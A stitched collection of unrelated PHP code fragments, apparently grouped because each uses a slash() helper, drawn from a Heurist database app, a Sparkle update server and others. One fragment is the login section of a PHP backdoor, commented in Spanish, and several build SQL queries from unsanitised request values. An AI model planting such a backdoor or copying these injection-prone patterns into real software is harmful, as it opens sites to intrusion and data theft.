function testSlash() { $this->assertEquals('foobar/', slash('foobar/')); $this->assertEquals('/foobar/', slash('/foobar/')); $this->assertEquals('/foobar/', slash('/foobar')); $this->assertEquals('/foobar/', slash('/foobar///')); }
function testSlash() { $this->equals(slash('foobar/'), 'foobar/'); $this->equals(slash('/foobar/'), '/foobar/'); $this->equals(slash('/foobar'), '/foobar/'); $this->equals(slash('/foobar///'), '/foobar/'); }
function getDir($path, $filter, $recursive, &$result, $ignore) { foreach (glob($path . '/*', GLOB_ONLYDIR) as $dir) { if ($dir == '.' | $dir == '..' | ignored($dir, $ignore)) { continue; } foreach (glob($dir . '/' . $filter) as $file) { if (ignored($file, $ignore)) { continue; } $f[] = slash(str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file), false); } if (count($f) > 0) { $result[] = array('DIR' => slash(str_replace($_SERVER['DOCUMENT_ROOT'], '/', $dir)), 'FILES' => $f); } if ($recursive) { if (getDir($dir, $filter, $recursive, $result, $ignore) === false) { return false; } } } return true; }
return true; } }; <?php } $res = mysql_query("select usr.ugr_ID, usr.ugr_Name, concat(usr.ugr_FirstName, ' ', usr.ugr_LastName) as fullname\n\t\tfrom " . USERS_DATABASE . ".sysUGrps usr\n\t\twhere usr.ugr_Enabled='y' and usr.ugr_FirstName is not null and usr.ugr_LastName is not null and !usr.ugr_IsModelUser\n\torder by fullname"); print " top.HEURIST.allUsers = {\n"; $first = true; while ($row = mysql_fetch_row($res)) { if (!$first) { print ","; } print "\n"; $first = false; print "\t\"" . $row[0] . "\":\t[ \"" . slash($row[1]) . "\", \"" . slash($row[2]) . "\" ]"; } print " };\n"; ?> top.HEURIST.is_registration_allowed = <?php echo defined('HEURIST_ALLOW_REGISTRATION') && HEURIST_ALLOW_REGISTRATION ? "true" : "false"; ?> ; top.HEURIST.is_logged_in = function() { return <?php echo intval(is_logged_in()); ?> > 0; }; top.HEURIST.get_user_id = function() { return <?php
?> , email: "<?php echo slash($rem["rem_ToEmail"]); ?> ", message: "<?php echo slash($rem["rem_Message"]); ?> ", when: "<?php echo slash($rem["rem_StartDate"]); ?> ", frequency: "<?php echo slash($rem["rem_Freq"]); ?> " } }) <?php } } else { if ($rec_id && $rem_id && $_POST["save-mode"] == "delete") { $res = mysql_query("delete from usrReminders where rem_ID={$rem_id} and rem_RecID={$rec_id} and rem_OwnerUGrpID=" . get_user_id()); if (!mysql_error()) { print "1"; } else { print "({ error: \"Internal database error - " . mysql_error() . "\" })"; } }
/** * Main method that parses POST and update details for given record ID * * @param int $recID */ function updateRecord($recID, $rtyID = null) { // Update the given record. // This is non-trivial: so that the versioning stuff (achive_*) works properly // we need to separate this into updates, inserts and deletes. // We get the currect record details and compare them against the post // if the details id is in the post[dtyID][dtlID] then compare the values $recID = intval($recID); // Check that the user has permissions to edit it. $res = mysql_query("select * from Records" . " left join sysUsrGrpLinks on ugl_GroupID=rec_OwnerUGrpID" . " left join defRecTypes on rty_ID=rec_RecTypeID" . " where rec_ID={$recID} and (! rec_OwnerUGrpID or rec_OwnerUGrpID=" . get_user_id() . " or ugl_UserID=" . get_user_id() . ")"); if (mysql_num_rows($res) == 0) { $res = mysql_query("select grp.ugr_Name from Records, " . USERS_DATABASE . ".sysUGrps grp where rec_ID={$recID} and grp.ugr_ID=rec_OwnerUGrpID"); $grpName = mysql_fetch_row($res); $grpName = $grpName[0]; print '({ error: "\\nSorry - you can\'t edit this record.\\nYou aren\'t in the ' . slash($grpName) . ' workgroup" })'; return; } $record = mysql_fetch_assoc($res); /*****DEBUG****/ error_log("save record dtls POST " . print_r($_POST, true)); // Upload any files submitted ... (doesn't have to take place right now, but may as well) uploadFiles(); //Artem: it does not work here - since we uploaded files at once // Get the existing records details and compare them to the incoming data $recDetails = getRecordDetails($recID); // find UPDATES - everything that is in current record and has a post value is treated as an update $recDetailUpdates = array(); /*****DEBUG****/ //error_log("save record dtls ".print_r($recDetails,true)); foreach ($recDetails as $dtyID => $dtlIDs) { $eltName = "type:" . $dtyID; if (!(@$_POST[$eltName] && is_array($_POST[$eltName]))) { // element wasn't in POST: ignore it -this could be a non-rectype detail unset($recDetails[$dtyID]); // remove from details so it's not deleted continue; } if (count($_POST[$eltName]) == 0) { // element was in POST but without content: values have been deleted client-side (need to be deleted in DB so leave POST) continue; } $bdInputHandler = getInputHandlerForType($dtyID); //returns the particular handler (processor) for given field type foreach ($dtlIDs as $dtlID => $val) { /*****DEBUG****/ //error_log(" in saveRecord details loop $dtyID, $dtlID, ".print_r($val,true)); $eltID = "bd:" . $dtlID; $val = @$_POST[$eltName][$eltID]; if (!$bdInputHandler->inputOK($val, $dtyID, $rtyID)) { /*****DEBUG****/ //error_log(" in saveRecord update details value check error $dtyID, $dtlID, ".print_r($val,true)); continue; // faulty input ... ignore } $toadd = $bdInputHandler->convertPostToMysql($val); /*****DEBUG****/ //error_log(" in saveRecord update details value converted from $val to $toadd"); if ($toadd == null) { continue; } $recDetailUpdates[$dtlID] = $toadd; $recDetailUpdates[$dtlID]["dtl_DetailTypeID"] = $dtyID; /* @TODO Since this function is utilized in (email)import we need to add verification of values according to detail type at the first for terms (enumeration field type) */ unset($_POST[$eltName][$eltID]); // remove data from post submission if (count($_POST[$eltName]) == 0) { // if nothing left in post dtyID then remove it also unset($_POST[$eltName]); } unset($recDetails[$dtyID][$dtlID]); // remove data from local reflection of the database } } /*****DEBUG****/ //error_log("save record dtls POST after updates removed ".print_r($_POST,true)); /*****DEBUG****/ //error_log("save record dtls after updates removed ".print_r($recDetails,true)); // find DELETES // Anything left in recDetails now represents recDetails rows that need to be deleted $bibDetailDeletes = array(); foreach ($recDetails as $dtyID => $dtlIDs) { foreach ($dtlIDs as $dtlID => $val) { array_push($bibDetailDeletes, $dtlID); } } // find INSERTS // Try to insert anything left in POST as new recDetails rows $bibDetailInserts = array(); /*****DEBUG****/ error_log(" in saveRecord checking for inserts _POST =" . print_r($_POST, true)); foreach ($_POST as $eltName => $bds) { // if not properly formatted or empty or an empty array then skip it if (!preg_match("/^type:\\d+\$/", $eltName) || !$_POST[$eltName] || count($_POST[$eltName]) == 0) { continue; } $dtyID = substr($eltName, 5); $bdInputHandler = getInputHandlerForType($dtyID); foreach ($bds as $eltID => $val) { if (!$bdInputHandler->inputOK($val, $dtyID, $rtyID)) { /*****DEBUG****/ //error_log(" in saveRecord insert details value check error for $eltName, $eltID, ".print_r($val,true)); continue; // faulty input ... ignore } $newBibDetail = $bdInputHandler->convertPostToMysql($val); $newBibDetail["dtl_DetailTypeID"] = $dtyID; $newBibDetail["dtl_RecID"] = $recID; /*****DEBUG****/ //error_log("new detail ".print_r($newBibDetail,true)); array_push($bibDetailInserts, $newBibDetail); unset($_POST[$eltName][$eltID]); // remove data from post submission } } // Anything left in POST now is stuff that we have no intention of inserting ... ignore it // We now have: // - $recDetailUpdates: an assoc. array of dtl_ID => column values to be updated in recDetails // - $bibDetailInserts: an array of column values to be inserted into recDetails // - $bibDetailDeletes: an array of dtl_ID values corresponding to rows to be deleted from recDetails // Commence versioning ... mysql_query("start transaction"); $recUpdates = array("rec_Modified" => array("now()"), "rec_FlagTemporary" => 0); $recUpdates["rec_ScratchPad"] = $_POST["notes"]; if (intval(@$_POST["rectype"])) { $recUpdates["rec_RecTypeID"] = intval($_POST["rectype"]); } if (array_key_exists("rec_url", $_POST)) { $recUpdates["rec_URL"] = $_POST["rec_url"]; } $owner = $record['rec_OwnerUGrpID']; if (is_admin() || is_admin('group', $owner) || $owner == get_user_id()) { // must be grpAdmin or record owner to changes ownership or visibility if (array_key_exists("rec_owner", $_POST)) { $recUpdates["rec_OwnerUGrpID"] = $_POST["rec_owner"]; } if (array_key_exists("rec_visibility", $_POST)) { $recUpdates["rec_NonOwnerVisibility"] = $_POST["rec_visibility"]; } else { if ($record['rec_NonOwnerVisibility'] == 'public' && HEURIST_PUBLIC_TO_PENDING) { $recUpdates["rec_NonOwnerVisibility"] = 'pending'; } } } /*****DEBUG****/ error_log(" in saveRecord update recUpdates = " . print_r($recUpdates, true)); mysql__update("Records", "rec_ID={$recID}", $recUpdates); $biblioUpdated = mysql_affected_rows() > 0 ? true : false; if (mysql_error()) { error_log("error rec update" . mysql_error()); } $updatedRowCount = 0; foreach ($recDetailUpdates as $bdID => $vals) { /*****DEBUG****/ error_log(" in saveRecord update details dtl_ID = {$bdID} value =" . print_r($vals, true)); mysql__update("recDetails", "dtl_ID={$bdID} and dtl_RecID={$recID}", $vals); if (mysql_affected_rows() > 0) { ++$updatedRowCount; } } if (mysql_error()) { error_log("error detail updates" . mysql_error()); } $insertedRowCount = 0; foreach ($bibDetailInserts as $vals) { /*****DEBUG****/ error_log(" in saveRecord insert details detail =" . print_r($vals, true)); mysql__insert("recDetails", $vals); if (mysql_affected_rows() > 0) { ++$insertedRowCount; } } if (mysql_error()) { error_log("error detail inserts" . mysql_error()); } $deletedRowCount = 0; if ($bibDetailDeletes) { /*****DEBUG****/ error_log(" in saveRecord delete details " . print_r($bibDetailDeletes, true)); mysql_query("delete from recDetails where dtl_ID in (" . join($bibDetailDeletes, ",") . ") and dtl_RecID={$recID}"); if (mysql_affected_rows() > 0) { $deletedRowCount = mysql_affected_rows(); } } if (mysql_error()) { error_log("error detail deletes" . mysql_error()); } // eliminate any duplicated lines $notesIn = explode("\n", str_replace("\r", "", $_POST["notes"])); $notesOut = ""; $notesMap = array(); for ($i = 0; $i < count($notesIn); ++$i) { if (!@$notesMap[$notesIn[$i]] || !$notesIn[$i]) { // preserve blank lines $notesOut .= $notesIn[$i] . "\n"; $notesMap[$notesIn[$i]] = true; } } $_POST["notes"] = preg_replace("/\n\n+/", "\n", $notesOut); if ($updatedRowCount > 0 || $insertedRowCount > 0 || $deletedRowCount > 0 || $biblioUpdated) { /* something changed: update the records title and commit all changes */ $title_check = check_title_mask2($record["rty_TitleMask"], $record["rec_RecTypeID"], true); if ($title_check != '') { $new_title = "Please go to Designer View > Essentials > Record types/fields and edit the title mask for this record type"; } else { $new_title = fill_title_mask($record["rty_TitleMask"], $record["rec_ID"], $record["rec_RecTypeID"]); } mysql_query("update Records\n set rec_Title = '" . addslashes($new_title) . "'\n where rec_ID = {$recID}"); mysql_query("commit"); // Update memcached's copy of record (if it is cached) updateCachedRecord($recID); return true; } else { /* nothing changed: rollback the transaction so we don't get false versioning */ mysql_query("rollback"); return false; } }
public static function city_list($wanted_region = null, $lang = 'en', $select = false) { if ($lang == 'en') { $lang_index = 0; } if ($lang == 'ar') { $lang_index = 1; } require "lists/lists_cities.php"; $regions = $cities; $i = 0; $res = []; foreach ($regions as $region) { $region_name = $region[0][$lang_index]; // if($lang_index==1) $region_name .= ' / '.$region[0][0]; foreach ($region[1] as $city) { if ($select) { $cities_array[strtolower(slash($city[0]))] = strtolower($city[$lang_index]); } else { $cities_array[] = $city[$lang_index]; } } // if($i==2) dd($cities_array); if (empty($cities_array)) { $cities_array = array(); } $res['region'][strtolower(slash($region[0][0]))] = $region_name; $res['city'][strtolower(slash($region[0][0]))] = $cities_array; $cities_array = array(); $i++; } if ($wanted_region != null) { return $res[$wanted_region]; } return $res; }
} mysql__update("usrBookmarks", "bkm_ID={$bkm_ID} and bkm_UGrpID={$usrID}", $updates); $res = mysql_query("select " . join(", ", array_keys($updates)) . " from usrBookmarks where bkm_ID={$bkm_ID} and bkm_UGrpID={$usrID}"); if (mysql_num_rows($res) == 1) { $dbVals = mysql_fetch_assoc($res); $hVals = array(); foreach ($dbVals as $colName => $val) { $hVals[$updatable[$colName][1]] = $val; } if ($tagString !== NULL) { $hVals["tagString"] = $tagString; } print "(" . json_format($hVals) . ")"; } else { if ($tagString !== NULL) { print "({tagString: \"" . slash($tagString) . "\"})"; } } } function doTagInsertion($bkm_ID) { global $usrID; //translate bmkID to record IT $res = mysql_query("select bkm_recID from usrBookmarks where bkm_ID={$bkm_ID}"); $rec_id = mysql_fetch_row($res); $rec_id = $rec_id[0] ? $rec_id[0] : null; if (!$rec_id) { return ""; } $tags = mysql__select_array("usrRecTagLinks, usrTags", "tag_Text", "rtl_RecID={$rec_id} and tag_ID=rtl_TagID and tag_UGrpID={$usrID} order by rtl_Order, rtl_ID"); $tagString = join(",", $tags);
if ($bibID && $bdtID) { mysql_query("update Records set rec_Modified=now() where rec_ID={$bibID}"); mysql_query("insert into recDetails (dtl_RecID, dtl_DetailTypeID, dtl_UploadedFileID) values ({$bibID}, {$bdtID}, {$fileID})"); } $file = get_uploaded_file_info($fileID, false, false); print json_format($file); /*({ file: { // saw TODO: update this to include url or nonce and thumbURL id: "<?= $file["ulf_ID"] ?>", origName: "<?= slash($file["ulf_OrigFileName"]) ?>", date: "<?= slash($file["ulf_Added"]) ?>", mimeType: "<?= slash($file["ulf_MimeExt"]) ?>", nonce: "<?= slash($file["ulf_ObfuscatedFileID"]) ?>", fileSize: "<?= slash($file["ulf_FileSizeKB"]) ?>", description: "<?= slash($file["ulf_Description"]) ?>" } })*/ } else { if ($fileID) { print "({ file: { origName: \"" . slash($_FILES["file"]["name"]) . "\" }, error: {$fileID} })"; } else { if ($_FILES["file"]["error"]) { print "({ file: { origName: \"" . slash($_FILES["file"]["name"]) . "\" }, error: \"Uploaded file was too large\" })"; } else { print "({ file: { origName: \"" . slash($_FILES["file"]["name"]) . "\" }, error: \"File upload was interrupted\" })"; } } } ?> </script> </head> <body onload="fireParentSubmitFunction()"></body> </html>
/** * change php object in to it's json description as a string * @param mixed [$obj] variable to convert to JSON * @param boolean [$purdy] whether to out put in pretty format (use newlines) * @return string JSON formatted description of the supplied variable/object */ function json_format($obj, $purdy = false) { // Return the data from $obj as a JSON format string if (!is_array($obj) && !is_object($obj)) { // Primitive scalar types if ($obj === null) { return "null"; } else { if (is_bool($obj)) { return $obj ? "true" : "false"; } else { if (is_integer($obj)) { return $obj; } else { if (is_float($obj)) { return $obj; } else { return '"' . slash($obj) . '"'; } } } } } // is it an array or an object? if (count($obj) == 0) { return "[]"; } else { if (isZeroBasedOrderedArray($obj)) { // Has a "0" element ... we'll call it an array $json = ""; foreach ($obj as $val) { if ($json) { $json .= ","; if ($purdy) { $json .= "\n"; } } $json .= json_format($val); } return "[" . $json . "]"; } else { // Do object output $json = ""; foreach ($obj as $key => $val) { if ($json) { $json .= ","; if ($purdy) { $json .= "\n"; } } if (preg_match('/^\\d+$/', $key)) { $json .= "\"" . $key . "\"" . ":" . json_format($val); } else { $json .= "\"" . slash($key) . "\":" . json_format($val); } } return "{" . $json . "}"; } } }
public function movies_info() { if (\Cache::has('genres_actors')) { $data = \Cache::get('genres_actors'); } else { $obj = new \movies_model(); $players_json_array = $obj->where('id', '>', 0)->lists('players'); $actors = []; foreach ($players_json_array as $p) { $out = json_decode($p); if (isset($out->actors) && $out->actors) { $actors = array_unique(array_merge($out->actors, $actors)); } if (isset($out->actor) && $out->actor) { $actors = array_unique(array_merge($out->actor, $actors)); } } $franch = $obj->where('franchises', '!=', '')->orderBy("year", "asc")->get(['franchises', 'link_id']); $final = []; foreach ($franch as $f) { $final[slash($f->franchises)][] = ["franch" => $f->franchises, "id" => $f->link_id]; } $franch = [$final]; sort($franch); sort($actors); $data['actors'] = $actors; $genres = \movies_model::lists('genre')->unique()->sort(); $data['genres'] = $genres; $data['franch'] = $franch; \Cache::add('genres_actors', $data, 4320); } return $data; }
$Error->blank($_POST['human_version'], 'Human Readable Version Number'); $Error->upload($_FILES['file'], 'file'); if ($Error->ok()) { $v = new Version(); $v->app_id = $app->id; $v->version_number = $_POST['version_number']; $v->human_version = $_POST['human_version']; $v->release_notes = $_POST['release_notes']; $v->dt = dater(); $v->downloads = 0; $v->filesize = filesize($_FILES['file']['tmp_name']); $v->signature = sign_file($_FILES['file']['tmp_name'], $app->sparkle_pkey); $object = strtolower(preg_replace('/[^a-zA-Z0-9]/', '', $app->name)) . "_" . $v->version_number . "." . substr($_FILES['file']['name'], -3); $v->url = slash($app->s3path) . $object; $info = parse_url($app->s3path); $object = ltrim(slash($info['path']) . $object, '/'); chmod($_FILES['file']['tmp_name'], 0755); $s3 = new S3($app->s3key, $app->s3pkey); $s3->uploadFile($app->s3bucket, $object, $_FILES['file']['tmp_name'], true); $v->insert(); redirect('versions.php?id=' . $app->id); } else { $version_number = $_POST['version_number']; $human_version = $_POST['human_version']; $release_notes = $_POST['release_notes']; } } else { $version_number = ''; $human_version = ''; $release_notes = ''; }
$updates["cmt_Deleted"] = true; } mysql__update("recThreadedComments", "cmt_ID={$cmt_id} and cmt_OwnerUgrpID=" . get_user_id(), $updates); if (mysql_error()) { $error = mysql_error(); } $res = mysql_query("select * from recThreadedComments left join " . USERS_DATABASE . ".sysUGrps usr on cmt_OwnerUgrpID=usr.ugr_ID where cmt_ID={$cmt_id} and ! cmt_Deleted"); $cmt = mysql_fetch_assoc($res); } else { if ($rec_id) { // ADD NEW COMMENT TO RECORD $inserts = array("cmt_Text" => $_POST["text"], "cmt_Added" => array("now()"), "cmt_OwnerUgrpID" => get_user_id(), "cmt_RecID" => $rec_id); if ($owner) { $inserts["cmt_ParentCmtID"] = $owner; } mysql__insert("recThreadedComments", $inserts); if (mysql_error()) { $error = mysql_error(); } $query = "select * from recThreadedComments left join " . USERS_DATABASE . ".sysUGrps usr on cmt_OwnerUgrpID=usr.ugr_ID where cmt_ID=" . mysql_insert_id(); $res = mysql_query($query); $cmt = mysql_fetch_assoc($res); } } if (@$error) { print "({ error: \"" . slash($error) . "\" })"; } else { if (@$cmt) { print "({ comment: " . json_format(array("id" => $cmt["cmt_ID"], "text" => $cmt["cmt_Text"], "owner" => $cmt["cmt_ParentCmtID"], "user" => $cmt["ugr_FirstName"] . ' ' . $cmt["ugr_LastName"], "userID" => $cmt["cmt_OwnerUgrpID"], "deleted" => false)) . " })"; } }
} $colNames = array("rec_ID", "rec_Title", "rec_URL", "rec_RecTypeID"); $query = REQUEST_to_query("select " . join(", ", $colNames) . " ", BOTH); if (@$_REQUEST["r"] == "recent") { $query = preg_replace("/\\swhere\\s/", " where (TOPBIBLIO.rec_RecTypeID!=1) AND " . "(TOPBIBLIO.rec_ID in (select distinct rre_RecID from usrRecentRecords where rre_UGrpID = " . get_user_id() . ")) and ", $query); // saw CHECK ME: this code assumes order by is last clause of query $query = preg_replace("/(.*)\\sorder by.*/", "\$1 order by TOPBIBLIO.rec_Modified desc", $query); } else { $query = preg_replace("/\\swhere\\s/", " where (TOPBIBLIO.rec_RecTypeID!=1) AND ", $query); } $query .= " limit {$limit}"; header("Content-type: text/javascript"); ?> ({ "searchID": "<?php echo slash($searchID); ?> ", "colNames": [ "<?php echo join("\", \"", $colNames); ?> " ], "records": [ <?php $res = mysql_query($query); $first = true; while ($row = mysql_fetch_row($res)) { if (!$first) { print ",\n"; }
$res = mysql_query("select * from Records where rec_ID = {$rec_id}"); $bib = mysql_fetch_assoc($res); if (!$bib) { print "{ error: \"invalid record ID - {$rec_id}\" }"; return; } /* check workgroup permissions */ if (array_key_exists("rec_OwnerUGrpID", $bib) && $bib["rec_OwnerUGrpID"] != $usrID && $bib["rec_OwnerUGrpID"] != 0 && $bib["rec_NonOwnerVisibility"] == "hidden") { /*****DEBUG****/ // error_log("select ugl_GroupID from ".USERS_DATABASE.".sysUsrGrpLinks where ugl_UserID=$usrID and ugl_GroupID=" . intval($bib["rec_OwnerUGrpID"])); $res = mysql_query("select ugl_GroupID from " . USERS_DATABASE . ".sysUsrGrpLinks " . "where ugl_UserID={$usrID} and ugl_GroupID=" . intval($bib["rec_OwnerUGrpID"])); if (!mysql_num_rows($res)) { $res = mysql_query("select grp.ugr_Name from " . USERS_DATABASE . ".sysUGrps grp where grp.ugr_ID=" . $bib["rec_OwnerUGrpID"]); $grp_name = mysql_fetch_row($res); $grp_name = $grp_name[0]; print "{ error: \"record is restricted to workgroup " . slash($grp_name) . "\" }"; return; } } /* check -- maybe the user has this bookmarked already ..? */ $res = mysql_query("select * from usrBookmarks where bkm_recID={$rec_id} and bkm_UGrpID={$usrID}"); if (mysql_num_rows($res) == 0) { /* full steam ahead */ mysql_query("insert into usrBookmarks (bkm_recID, bkm_UGrpID, bkm_Added, bkm_Modified) values (" . $rec_id . ", {$usrID}, now(), now())"); $res = mysql_query("select * from usrBookmarks where bkm_ID=last_insert_id()"); if (mysql_num_rows($res) == 0) { print "{ error: \"internal database error while adding bookmark\" }"; return; } $bkmk = mysql_fetch_assoc($res); $tagString = "";
function arr_to_str($array, $delemeter = "/", $func = null) { if (!is_array($array)) { die('<h1>arr_to_str() says: it isn\'s an array...</h1>'); } // $str = implode($delemeter,$array); $new = []; foreach ($array as $key => $val) { if ($func == 'slash') { $new[$key] = slash($val); } elseif ($func == 'unslash') { $new[$key] = u(unslash($val)); } else { $new[$key] = $val; } } $str = implode($delemeter, $new); return $str; }
print '({ "error": "User unauthorised to fetch workgroup data for workgroup ' . $wg_id . '" })'; return; } ?> { "members": [<?php $res = mysql_query("select usr.ugr_ID, concat(usr.ugr_FirstName,' ',usr.ugr_LastName) as name, usr.ugr_eMail\n\t\t\t\t\t from " . USERS_DATABASE . ".sysUsrGrpLinks\n\t\t\t\t left join " . USERS_DATABASE . ".sysUGrps usr on usr.ugr_ID = ugl_UserID\n\t\t\t\t\t where usr.ugl_GroupID = " . $wg_id . "\n\t\t\t\t\t and usr.ugr_Enabled = 'y'\n\t\t\t\t order by usr.ugr_LastName"); $first = true; while ($row = mysql_fetch_row($res)) { if (!$first) { print ","; } print "\n"; $first = false; print "\t\t{ \"id\": " . slash($row[0]) . ", \"name\": \"" . slash($row[1]) . "\", \"email\": \"" . slash($row[2]) . "\" }"; } ?> ], "savedSearches": [ <?php $res = mysql_query("select svs_Name, ss_url, ss_url not like '%w=bookmark%' as w_all\n\t\t\t\t\t from usrSavedSearches\n\t\t\t\t\t where svs_UGrpID=" . $wg_id . "\n\t\t\t\t order by svs_Name"); $first = true; while ($row = mysql_fetch_assoc($res)) { if (!$first) { print ","; } print "\n"; $first = false; print "\t\t[ \"" . addslashes($row['svs_Name']) . "\", \"" . addslashes($row['ss_url']) . "\", 0, " . intval($row['w_all']) . " ]";
function saveRelationship($recID, $relTermID, $trgRecID, $interpRecID, $title, $notes, $start_date, $end_date) { $relval = mysql_fetch_assoc(mysql_query("select trm_Label from defTerms where trm_ID = {$relTermID}")); $relval = $relval['trm_Label']; $srcTitle = mysql_fetch_assoc(mysql_query("select rec_Title from Records where rec_ID = {$recID}")); $srcTitle = $srcTitle['rec_Title']; $trgTitle = mysql_fetch_assoc(mysql_query("select rec_Title from Records where rec_ID = {$trgRecID}")); $trgTitle = $trgTitle['rec_Title']; mysql__insert("Records", array("rec_Title" => "{$title} ({$srcTitle} {$relval} {$trgTitle})", "rec_Added" => date('Y-m-d H:i:s'), "rec_Modified" => date('Y-m-d H:i:s'), "rec_RecTypeID" => RT_RELATION, 'rec_OwnerUGrpID' => intval(@$_REQUEST['rec_owner']) ? intval($_REQUEST['rec_owner']) : (@$userDefaultOwnerGroupID ? $userDefaultOwnerGroupID : (defined('HEURIST_NEWREC_OWNER_ID') ? HEURIST_NEWREC_OWNER_ID : get_user_id())), "rec_AddedByUGrpID" => get_user_id())); if (mysql_error()) { return array("error" => slash(mysql_error())); } $relnRecID = mysql_insert_id(); $res = null; if ($relnRecID > 0 && defined('DT_NAME') && defined('DT_RELATION_TYPE') && defined('DT_TARGET_RESOURCE') && defined('DT_PRIMARY_RESOURCE')) { $query = "insert into recDetails (dtl_RecID, dtl_DetailTypeID, dtl_Value) values "; $query .= "({$relnRecID}, " . DT_NAME . ", '" . mysql_real_escape_string($title) . "')"; $query .= ", ({$relnRecID}, " . DT_PRIMARY_RESOURCE . ", {$recID})"; $query .= ", ({$relnRecID}, " . DT_TARGET_RESOURCE . ", {$trgRecID})"; $query .= ", ({$relnRecID}, " . DT_RELATION_TYPE . ", {$relTermID})"; if ($interpRecID && defined('DT_INTERPRETATION_REFERENCE')) { $query .= ", ({$relnRecID}, " . DT_INTERPRETATION_REFERENCE . ", {$interpRecID})"; } if ($notes && defined('DT_SHORT_SUMMARY')) { $query .= ", ({$relnRecID}, " . DT_SHORT_SUMMARY . ", '" . mysql_real_escape_string($notes) . "')"; } if ($start_date && defined('DT_START_DATE')) { $query .= ", ({$relnRecID}, " . DT_START_DATE . ", '" . mysql_real_escape_string($start_date) . "')"; } if ($end_date && defined('DT_END_DATE')) { $query .= ", ({$relnRecID}, " . DT_END_DATE . ", '" . mysql_real_escape_string($end_date) . "')"; } $res = mysql_query($query); } if (mysql_error()) { return array("error" => slash(mysql_error())); } else { // $related = getAllRelatedRecords($recID, $relnRecID); $related = getAllRelatedRecords($recID); return array("relationship" => $related, "relnRecID" => $relnRecID); } }
$data = get_data_from_url($v->url); if (!$data) { die("The file at <a href='{$v->url}'>{$v->url}</a> does not exist or is empty!"); } file_put_contents($tmpfile, $data); } else { $tmpfile = $_FILES['file']['tmp_name']; } $v->filesize = filesize($tmpfile); $v->signature = sign_file($tmpfile, $app->sparkle_pkey); if (!$v->url) { $object = strtolower(preg_replace('/[^a-zA-Z0-9]/', '', $app->name)) . "_" . $v->version_number . "." . substr($_FILES['file']['name'], -3); if ($app->s3bucket && $app->s3path) { $v->url = slash($app->s3path) . $object; $info = parse_url($app->s3path); $object = slash($info['path']) . $object; chmod($tmpfile, 0755); $s3 = new S3($app->s3key, $app->s3pkey); $s3->putObject($app->s3bucket, $object, $tmpfile, true); } else { die("Configure your Amazon S3 account or modify version-new.php file."); /* $v->url = '/Users/dirk/work/wordpress/shine/' . $object; copy($_FILES['file']['tmp_name'], '/Users/dirk/work/wordpress/shine/' . $object); */ } } else { // Cleanup download unlink($tmpfile); } $v->insert();
$link_actual = "http://" . $HTTP_HOST . $REQUEST_URI; /* nombre puesto al backdoor ej: backdoor.php, ingresar solo backdoor */ $uri = $REQUEST_URI; /*Funcion para quitar slash*/ function slash($valor) { $nopermitido = array("/"); $valor = str_replace($nopermitido, "", $valor); return $valor; } /*Armamos el link*/ if (strpos($uri, "?")) { $last_uri = explode("?", $uri); $nombre_backdoor = slash($last_uri[0]); } else { $nombre_backdoor = slash($uri); } session_start(); if (!isset($_SESSION['user'])) { /* * Verificamos que se haya enviado el formulario de login * y comprobamos los datos */ if (isset($_POST['cerrojo'])) { if ($_POST['key'] == $pass and $_POST['cerrojo'] == $user) { session_start(); $_SESSION['user'] = $user; header("Location:{$link_actual}"); } else { if (empty($_POST['key']) or empty($_POST['cerrojo'])) { echo "<script>alert('Ingresa tus datos')</script>";
echo $app->name; ?> <?php echo $v->human_version; ?> </title> <description><![CDATA[ <?php echo $v->release_notes; ?> ]]></description> <pubDate><?php echo dater($v->dt, 'D, d M Y H:i:s O'); ?> </pubDate> <enclosure url="<?php echo "http://" . $_SERVER['HTTP_HOST'] . slash(WEB_ROOT) . "update.php?id={$v->id}"; ?> " sparkle:shortVersionString="<?php echo $v->human_version; ?> " sparkle:version="<?php echo $v->version_number; ?> " length="<?php echo $v->filesize; ?> " type="application/octet-stream" sparkle:dsaSignature="<?php echo $v->signature; ?> " /> </item>
/** * 写一个 PHP 缓存文件; * @param string $dir 目录路径; * @param string $cachename 文件名; * @param array $data 数据; * @param string $prefix 文件名前缀; */ function write_cache_file($dir, $cachename, $data = array(), $prefix = 'cache_') { if (!empty($data) && is_array($data)) { $cachedata = "\$cache = " . rvar_export($data) . ";\n\n"; } else { $cachedata = $data; } rfwrite(slash($dir . $prefix . $cachename) . '.php', "<?php\n//Myws! cache file, DO NOT modify me!\n//Created on " . date("M j, Y, G:i") . "\n\n" . $cachedata, 'w'); }